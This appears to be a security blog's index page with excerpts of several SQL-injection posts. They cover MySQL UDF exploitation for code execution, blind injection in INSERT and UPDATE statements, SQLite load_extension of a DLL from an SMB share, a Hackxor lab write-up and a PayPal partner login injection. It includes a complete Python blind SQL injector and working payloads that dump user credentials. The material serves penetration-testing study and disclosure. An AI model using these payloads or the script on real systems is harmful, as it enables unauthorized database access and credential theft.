MySQL UDF Exploitation

Overview

In the real world, while I was pentesting a financial institute I came across a scenario where they had an internal intranet and it was using MySQL 5.7 64-bit as the backend database technology. Most of the time the I encounter MSSQL in most cooperate environments, but this was a rare case. I found SQL injection in the web application and I was able to dump the username and password from the mysql.user and I realized it had privileges to write files to disk. This lead me into writing a post and sharing techniques in injecting a UDF library to MySQL and gaining code execution and popping a shell in Windows. When I Googled most techniques are a bit vague when it comes to Windows. So, I thought of writing this post with my own research to clear things and make you understand few tricks you can use to do this manually.

I will be hosting the latest MySQL 5.7.21 latest community server by the time I am blogging this, in one machine. To reproduce the scenario, I am running the mysqld server with ‘–secure-file-priv=’ parameter set to blank. In this scenario I was able to retrieve the username and password from the mysql.user table using a union based injection in the intranet. Note that in MySQL 5.7 and above the column ‘password’ doesn’t exists. They have changed it to ‘authentication_string’.

# MySQL 5.6 and below
select host, user, password from mysql.user;
# MySQL 5.7 and above
select host, user, authentication_string from mysql.user;

Note that you can use the metasploit’s mysql_hashdump.rb auxiliary module to dump the MySQL hashes if you already have the credentials. By the time I am writing this blog post the script needed to be updated to extract in MySQL 5.7 you can check my pull request here

The host column for the user ‘osanda’ allows connections from 192.168.0.*, which means we can use this user for remote connections from that IP range. I cracked password hash and got the plain text password.
(more…)

Advertisements

MySQL Blind Injection in Insert and Update Statements

I’m not going to explain or write about blind injection in general. There are enough resources on the internet where you can learn. You can check my previous post where I have explained in detail about other types of injections in these statements. Since some of you asked me how to perform blind injection I thought of writing this post.

Boolean Based Blind Injection

We can use ‘+’ or bitwise OR in this scenario. If the result is true the entry will be updated with a ‘1’ and if the result is false the entry will be updated with a ‘0’.
I’m using binary search to make the search faster. Mid = (max+min)/2.
However I’m not sure if this is realistic.

update users set username =0’ | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;
insert into users values (15,’osanda’,'0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));

Time Based Blind Injection

This approach would be realistic. In this case we can use functions such as sleep(), benchmark(). Like before by using ‘+’ or bitwise OR we can know if the result is true or false when updated or inserted.

update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
insert into users values (16,’osanda’,'0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));

Conclusion

The same can be applied to DELETE statements as well, but the injection is not realistic. There are many methods you can follow using the above syntax. You can develop your own tool to automate this process and improve the efficiency of the search.

Fun with SQLite Load_Extension

What is load_extension?

This interface loads an SQLite extension library from the named file.

int sqlite3_load_extension(
sqlite3 *db, /* Load the extension into this database connection */
const char *zFile, /* Name of the shared library containing extension */
const char *zProc, /* Entry point. Derived from zFile if 0 */
char **pzErrMsg /* Put error message here if not 0 */
);

More information: https://www.sqlite.org/c3ref/load_extension.html
You can use this function to load a SQLite extension. However by default sqlite3_enable_load_extension() is turned off by default to prevent this in SQL injection attacks. You can read more from here https://www.sqlite.org/c3ref/enable_load_extension.html
The syntax would be

select load_extension(‘path\dll’, ‘EP’);

However this path, const char *zFile can be a SMB share too.
(more…)

Automated Blind SQL Injector

There are lots of tools available for blind injection but when it comes to customizing payloads and bypassing WAFs I thought of writing my own program to extract data based on the true and false boolean conditions.

This is the Python version: https://github.com/OsandaMalith/BSSQLi/blob/master/bssqli.py

import urllib2
import re

# CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
# https://creativecommons.org/licenses/by/2.0/

url = 'http://testphp.vulnweb.com/artists.php?artist=2' # target
payload = '(select user())'; # your payload
trueString = 'Blad3' # Text or html in the true condition
maxLength = 20
result = ''
for i in range(1, maxLength + 1):
    for j in range(32, 127):
        if(chr(j).isupper()):
            continue
        sql = " and substring("+ payload +"," + str(i) + ",1)=" + hex(ord(chr(j))) + "-- -"
        target = url + sql
        req = urllib2.Request(target)
        # If cookies exists
        # req.add_header('Cookie','value=1;value=2')
        page = urllib2.urlopen(req)
        html = page.read()

        try:
            re.search(r'(.*)'+trueString+'(.*?) .*', html, flags=re.DOTALL).group(1)
            print ('Found: ' + chr(j))
            result += chr(j)
        except:
            pass

print (result)

(more…)

Hackxor SQL Injection

You can download the complete challenge VM from here. They have provided the online version of first two levels. I was interested in having a look at it. http://cloaknet.csc.kth.se:8080/proxy.jsp

There is a login page and our goal is to extract all the usernames and passwords from the database.

If you try injecting the login form, none of the injections would work. But there was this text called “No account?” when you click it you get this message.

After logging with demo:demo we are taken to “proxypanel.jsp” which displays source, target and date.


(more…)

Paypal Partner SQL Injection

One of the Paypal Partner websites http://ppinvoice.com/ was suffering from a POST SQL injection. Union injection was impossible in here.

LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3

As we cannot continue with the above error, double query injection works perfect.
(more…)